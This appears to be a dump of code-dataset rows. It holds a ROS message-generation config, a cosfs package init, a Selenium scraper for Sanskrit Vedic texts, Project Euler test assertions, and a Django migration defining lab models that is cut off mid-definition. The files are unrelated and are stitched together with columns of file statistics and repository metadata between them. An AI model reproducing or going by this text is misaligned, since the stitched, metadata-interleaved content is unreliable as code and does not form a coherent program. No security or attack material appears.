messages_str = "/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Accel.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/AccelStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/AccelWithCovariance.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/AccelWithCovarianceStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Inertia.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/InertiaStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Point.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Point32.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PointStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Polygon.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PolygonStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Pose2D.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Pose.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PoseArray.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PoseStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PoseWithCovariance.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/PoseWithCovarianceStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Quaternion.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/QuaternionStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Transform.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/TransformStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Twist.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/TwistStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/TwistWithCovariance.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/TwistWithCovarianceStamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Vector3.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Vector3Stamped.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/Wrench.msg;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg/WrenchStamped.msg"
services_str = ""
pkg_name = "geometry_msgs"
dependencies_str = "std_msgs"
langs = "gencpp;genlisp;genpy"
dep_include_paths_str = "geometry_msgs;/home/pls/ydlidar_ws/src/ros/common_msgs/geometry_msgs/msg;std_msgs;/usr/share/std_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python3"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/usr/lib/genmsg/genmsg_check_deps.py"
| 222.916667
| 2,227
| 0.843738
| 447
| 2,675
| 4.800895
| 0.167785
| 0.178938
| 0.195713
| 0.223672
| 0.696179
| 0.696179
| 0.696179
| 0.696179
| 0.696179
| 0.696179
| 0
| 0.002272
| 0.01271
| 2,675
| 11
| 2,228
| 243.181818
| 0.810299
| 0.018318
| 0
| 0
| 1
| 0.222222
| 0.922637
| 0.89939
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
a348e693fafe80e9418495d3dbcc2e9d576fb160
| 58
|
py
|
Python
|
cosfs/__init__.py
|
Panxing4game/cosfs
|
cd37b5accd6aa14cb60d71a691f615e22c31c4a0
|
[
"Apache-2.0"
] | null | null | null |
cosfs/__init__.py
|
Panxing4game/cosfs
|
cd37b5accd6aa14cb60d71a691f615e22c31c4a0
|
[
"Apache-2.0"
] | 1
|
2021-12-09T07:39:58.000Z
|
2021-12-10T01:45:34.000Z
|
cosfs/__init__.py
|
Panxing4game/cosfs
|
cd37b5accd6aa14cb60d71a691f615e22c31c4a0
|
[
"Apache-2.0"
] | null | null | null |
from .core import COSFileSystem
from .core import COSFile
| 19.333333
| 31
| 0.827586
| 8
| 58
| 6
| 0.625
| 0.333333
| 0.583333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.137931
| 58
| 2
| 32
| 29
| 0.96
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
a3954c745eb1029d3dd1df5c75c8e1f705c2152a
| 6,056
|
py
|
Python
|
curation_projects/veda/paraankusha.py
|
lalitaalaalitah/doc_curation
|
d26072dc5afd645019788b4844058da5d0c63ebe
|
[
"MIT"
] | 7
|
2020-04-25T08:55:55.000Z
|
2020-12-21T05:31:00.000Z
|
curation_projects/veda/paraankusha.py
|
lalitaalaalitah/doc_curation
|
d26072dc5afd645019788b4844058da5d0c63ebe
|
[
"MIT"
] | 15
|
2020-04-25T08:31:42.000Z
|
2021-07-24T12:23:42.000Z
|
curation_projects/veda/paraankusha.py
|
lalitaalaalitah/doc_curation
|
d26072dc5afd645019788b4844058da5d0c63ebe
|
[
"MIT"
] | 4
|
2020-04-25T06:28:37.000Z
|
2020-12-19T21:30:10.000Z
|
import logging
import os
import sys
import traceback
from selenium.common.exceptions import NoSuchElementException
from doc_curation import text_data, md_helper
from doc_curation.scraping import parankusha
def get_taittiriiya(browser):
# parankusha.click_link_by_text(browser=browser, element_text="मूलपाठः")
# get_text(browser=browser, text_id="पदपाठः", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/padapAThaH/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/mUlam/saMhitA.json"))
# get_text(browser=browser, text_id="क्रमपाठः", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/kramapAThaH/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/mUlam/saMhitA.json"))
# get_text(browser=browser, text_id="संहितायाः भट्टभास्करभाष्यम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/bhaTTa-bhAskara/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/bhAShya/bhaTTa-bhAskara/saMhitA.json"))
# get_text(browser=browser, text_id="संहितायाः सायणभाष्यम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/sAyaNa/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/bhAShya/bhaTTa-bhAskara/saMhitA.json"))
# get_text(browser=browser, text_id="संहिता", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/mUlam/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/mUlam/saMhitA.json"))
parankusha.get_structured_text(browser=browser, start_nodes=["विद्यास्थानानि", "वेदाः", "यजुर्वेदः", "कृष्णयजुर्वेदः", "भाष्यम्", "भट्टभास्करभाष्यम्", "ब्राह्मणस्य भट्टभास्करभाष्यम्", "expand:ब्राह्मणस्य भट्टभास्करभाष्यम्"], base_dir="/home/vvasuki/vvasuki-git/saMskAra/content/sangrahaH/taittirIyA/brAhmaNam/bhaTTa-bhAskara-bhAShyam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "vedaH/taittirIya/bhAShya/bhaTTa-bhAskara/brAhmaNa.json"))
# get_text(browser=browser, text_id="ब्राह्मणम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/mUlam/brAhmaNam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/mUlam/brAhmaNa.json"))
# get_text(browser=browser, text_id="ब्राह्मणस्य सायणभाष्यम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/sAyaNa/brAhmaNam/", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/bhAShya/bhaTTa-bhAskara/brAhmaNa.json"))
# get_text(browser=browser, text_id="आरण्यकम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/mUlam/AraNyakam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/mUlam/AraNyaka.json"))
# get_text(browser=browser, text_id="आरण्यकस्य भट्टभास्करभाष्यम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/bhaTTa-bhAskara/AraNyakam/", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/bhAShya/bhaTTa-bhAskara/AraNyaka.json"))
# get_text(browser=browser, text_id="आरण्यकस्य सायणभाष्यम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/sAyaNa/AraNyakam/", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/bhAShya/bhaTTa-bhAskara/AraNyaka.json"))
# get_text(browser=browser, text_id="काठकम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/mUlam/kAThakam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/mUlam/kAThaka.json"))
# get_text(browser=browser, text_id="काठकस्य भट्टभास्करभाष्यम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/taittirIya/bhaTTa-bhAskara/kAThakam/", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/taittirIya/bhAShya/bhaTTa-bhAskara/kAThaka.json"))
# def get_rv():
# # get_text(browser=browser, text_id="क्रमपाठः", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/shakala/kramapAThaH/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/shakala/saMhitA.json"))
# # get_text(browser=browser, text_id="पदपाठः", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/shakala/padapAThaH/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/shakala/saMhitA.json"))
# # get_text(browser=browser, text_id="ब्राह्मणम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/shakala/brAhmaNam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/shakala/brAhmaNam.json"))
# # get_text(browser=browser, text_id="आरण्यकम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/shakala/AraNyakam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/shakala/AraNyakam.json"))
#
#
# def get_kauthuma():
# parankusha.click_link_by_text(browser=browser, element_text="ऋग्वेदः")
# parankusha.click_link_by_text(browser=browser, element_text="यजुर्वेदः")
# # get_text(browser=browser, text_id="संहिता", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/kauthuma/saMhitA", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/kauthuma/saMhitA.json"))
# # get_text(browser=browser, text_id="छन्दःपदम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/kauthuma/ChandaHpadam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/kauthuma/ChandaHpadam.json"))
# get_text(browser=browser, text_id="स्तोभपदम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/kauthuma/stobhapadam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/kauthuma/stobhapadam.json"))
# # get_text(browser=browser, text_id="रहस्यगानम्", base_dir="/home/vvasuki/sanskrit/raw_etexts/veda/kauthuma/rahasyagAnam", unit_info_file=os.path.join(os.path.dirname(text_data.__file__), "veda/kauthuma/rahasyagAnam.json"))
if __name__ == '__main__':
browser = parankusha.get_logged_in_browser(headless=False)
get_taittiriiya(browser=browser)
# get_rv()
# get_kauthuma()
# browser.implicitly_wait(13)
browser.close()
| 106.245614
| 464
| 0.768824
| 1,109
| 6,056
| 4.092876
| 0.12083
| 0.055519
| 0.095175
| 0.083278
| 0.851069
| 0.848645
| 0.848645
| 0.840053
| 0.820665
| 0.777484
| 0
| 0.00035
| 0.056473
| 6,056
| 56
| 465
| 108.142857
| 0.768113
| 0.83537
| 0
| 0
| 0
| 0.230769
| 0.303441
| 0.158498
| 0
| 0
| 0
| 0
| 0
| 1
| 0.076923
| false
| 0
| 0.538462
| 0
| 0.615385
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
|
0
| 11
|
6e5f5124411f1478a7d23c9e37403e05b55ee90f
| 1,709
|
py
|
Python
|
projecteuler/problems/tests/test_problems_0051_0100.py
|
Tenebrar/codebase
|
59c9a35289fb29afedad0e3edd0519b67372ef9f
|
[
"Unlicense"
] | 1
|
2020-04-21T11:39:25.000Z
|
2020-04-21T11:39:25.000Z
|
projecteuler/problems/tests/test_problems_0051_0100.py
|
Tenebrar/codebase
|
59c9a35289fb29afedad0e3edd0519b67372ef9f
|
[
"Unlicense"
] | 7
|
2020-02-12T01:08:01.000Z
|
2022-02-10T11:56:56.000Z
|
projecteuler/problems/tests/test_problems_0051_0100.py
|
Tenebrar/codebase
|
59c9a35289fb29afedad0e3edd0519b67372ef9f
|
[
"Unlicense"
] | null | null | null |
from projecteuler.problems.problems_0051_0100.problem_0051_prime_digit_replacements import problem_0051
from projecteuler.problems.problems_0051_0100.problem_0052_permuted_multiples import problem_0052
from projecteuler.problems.problems_0051_0100.problem_0053_combinatoric_selections import problem_0053
from projecteuler.problems.problems_0051_0100.problem_0054_poker_hands import problem_0054
from projecteuler.problems.problems_0051_0100.problem_0055_lychrel_numbers import problem_0055
from projecteuler.problems.problems_0051_0100.problem_0056_powerful_digit_sum import problem_0056
from projecteuler.problems.problems_0051_0100.problem_0057_square_root_convergents import problem_0057
from projecteuler.problems.problems_0051_0100.problem_0058_spiral_primes import problem_0058
from projecteuler.problems.problems_0051_0100.problem_0059_xor_decryption import problem_0059
from projecteuler.problems.problems_0051_0100.problem_0063_powerful_digit_counts import problem_0063
def test_problem_0051():
assert problem_0051(6) == 13
assert problem_0051(7) == 56003
assert problem_0051(8) == 121313
def test_problem_0052():
assert problem_0052() == 142857
def test_problem_0053():
assert problem_0053() == 4075
def test_problem_0054():
assert problem_0054('p054_poker.txt') == 376
def test_problem_0055():
assert problem_0055(10000) == 249
def test_problem_0056():
assert problem_0056(100) == 972
def test_problem_0057():
assert problem_0057(1000) == 153
def test_problem_0058():
assert problem_0058(0.1) == 26241
def test_problem_0059():
assert problem_0059('p059_cipher.txt') == 129448
def test_problem_0063():
assert problem_0063() == 49
| 32.245283
| 103
| 0.829725
| 236
| 1,709
| 5.59322
| 0.271186
| 0.118182
| 0.181818
| 0.242424
| 0.356061
| 0.356061
| 0.356061
| 0
| 0
| 0
| 0
| 0.208089
| 0.102984
| 1,709
| 52
| 104
| 32.865385
| 0.652968
| 0
| 0
| 0
| 0
| 0
| 0.016969
| 0
| 0
| 0
| 0
| 0
| 0.375
| 1
| 0.3125
| true
| 0
| 0.3125
| 0
| 0.625
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6e6e5dd3837aba85634a4c33712013b2a2d65014
| 132,264
|
py
|
Python
|
liliapi/migrations/0001_initial.py
|
USGS-WiM/liliservices
|
546b5709aaba237a478bd19c10cb162f6ce426dd
|
[
"CC0-1.0"
] | null | null | null |
liliapi/migrations/0001_initial.py
|
USGS-WiM/liliservices
|
546b5709aaba237a478bd19c10cb162f6ce426dd
|
[
"CC0-1.0"
] | 7
|
2020-01-29T19:53:33.000Z
|
2021-06-10T19:38:52.000Z
|
liliapi/migrations/0001_initial.py
|
USGS-WiM/liliservices
|
546b5709aaba237a478bd19c10cb162f6ce426dd
|
[
"CC0-1.0"
] | null | null | null |
# Generated by Django 2.2.10 on 2020-02-18 15:37
import datetime
from decimal import Decimal
from django.conf import settings
import django.core.validators
from django.db import migrations, models
import django.db.models.deletion
import liliapi.models
import simple_history.models
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='AnalysisBatch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('analysis_batch_description', models.CharField(blank=True, max_length=128)),
('analysis_batch_notes', models.CharField(blank=True, max_length=128)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='analysisbatch_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='analysisbatch_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'analysisbatches',
'db_table': 'lili_analysisbatch',
},
),
migrations.CreateModel(
name='ConcentrationType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='concentrationtype_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='concentrationtype_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_concentrationtype',
},
),
migrations.CreateModel(
name='ExtractionBatch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('re_extraction_notes', models.TextField(blank=True)),
('extraction_number', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('extraction_volume', liliapi.models.NonnegativeDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('extraction_date', models.DateField(db_index=True, default=datetime.date.today)),
('pcr_date', models.DateField(db_index=True, default=datetime.date.today)),
('qpcr_template_volume', models.DecimalField(decimal_places=10, default=6, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('elution_volume', liliapi.models.NonzeroDecimalField2010(decimal_places=10, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('sample_dilution_factor', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('qpcr_reaction_volume', models.DecimalField(decimal_places=10, default=20, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('ext_pos_dna_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_pos_dna_invalid', models.BooleanField(default=True)),
('inh_pos_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('analysis_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='extractionbatches', to='liliapi.AnalysisBatch')),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='extractionbatch_creator', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'extractionbatches',
'db_table': 'lili_extractionbatch',
},
),
migrations.CreateModel(
name='FilterType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='filtertype_creator', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_filtertype',
},
),
migrations.CreateModel(
name='Freezer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('racks', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('boxes', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('rows', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('spots', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='freezer_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='freezer_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_freezer',
},
),
migrations.CreateModel(
name='Inhibition',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('inhibition_date', models.DateField(db_index=True, default=datetime.date.today)),
('cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('dilution_factor', models.IntegerField(blank=True, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='inhibition_creator', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='inhibitions', to='liliapi.ExtractionBatch')),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='inhibition_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_inhibition',
},
),
migrations.CreateModel(
name='Matrix',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('code', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='matrix_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='matrix_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'matrices',
'db_table': 'lili_matrix',
},
),
migrations.CreateModel(
name='NucleicAcidType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='nucleicacidtype_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='nucleicacidtype_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_nucleicacidtype',
},
),
migrations.CreateModel(
name='PCRReplicateBatch',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('replicate_number', liliapi.models.NonnegativeIntegerField(validators=[django.core.validators.MinValueValidator(0)])),
('notes', models.TextField(blank=True)),
('ext_neg_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_neg_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_neg_invalid', models.BooleanField(default=True)),
('rt_neg_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('rt_neg_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('rt_neg_invalid', models.BooleanField(default=True)),
('pcr_neg_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_neg_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_neg_invalid', models.BooleanField(default=True)),
('pcr_pos_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_pos_gc_reaction', liliapi.models.NullableNonnegativeDecimalField120100(blank=True, decimal_places=100, max_digits=120, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('pcr_pos_invalid', models.BooleanField(default=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicatebatch_creator', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='pcrreplicatebatches', to='liliapi.ExtractionBatch')),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='pcrreplicatebatch_modifier', to=settings.AUTH_USER_MODEL)),
('re_pcr', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='pcrreplicatebatches', to='liliapi.PCRReplicateBatch')),
],
options={
'verbose_name_plural': 'pcrreplicatebatches',
'db_table': 'lili_pcrreplicatebatch',
},
),
migrations.CreateModel(
name='RecordType',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('name', models.CharField(max_length=128, unique=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='recordtype_creator', to=settings.AUTH_USER_MODEL)),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='recordtype_modifier', to=settings.AUTH_USER_MODEL)),
],
options={
'db_table': 'lili_recordtype',
},
),
migrations.CreateModel(
name='ReverseTranscription',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('modified_date', models.DateField(auto_now=True, null=True)),
('template_volume', models.DecimalField(decimal_places=10, default=8.6, max_digits=20, validators=[django.core.validators.MinValueValidator(0)])),
('reaction_volume', models.DecimalField(decimal_places=10, default=50, max_digits=20, validators=[django.core.validators.MinValueValidator(Decimal('1E-10'))])),
('rt_date', models.DateField(blank=True, db_index=True, default=datetime.date.today, null=True)),
('re_rt_notes', models.TextField(blank=True)),
('ext_pos_rna_rt_cq_value', liliapi.models.NullableNonnegativeDecimalField2010(blank=True, decimal_places=10, max_digits=20, null=True, validators=[django.core.validators.MinValueValidator(0)])),
('ext_pos_rna_rt_invalid', models.BooleanField(default=True)),
('created_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='reversetranscription_creator', to=settings.AUTH_USER_MODEL)),
('extraction_batch', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='reversetranscriptions', to='liliapi.ExtractionBatch')),
('modified_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='reversetranscription_modifier', to=settings.AUTH_USER_MODEL)),
('re_rt', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='reversetranscriptions', to='liliapi.ReverseTranscription')),
],
options={
'db_table': 'lili_reversetranscription',
'unique_together': {('extraction_batch', 're_rt')},
},
),
migrations.CreateModel(
name='Sample',
fields=[
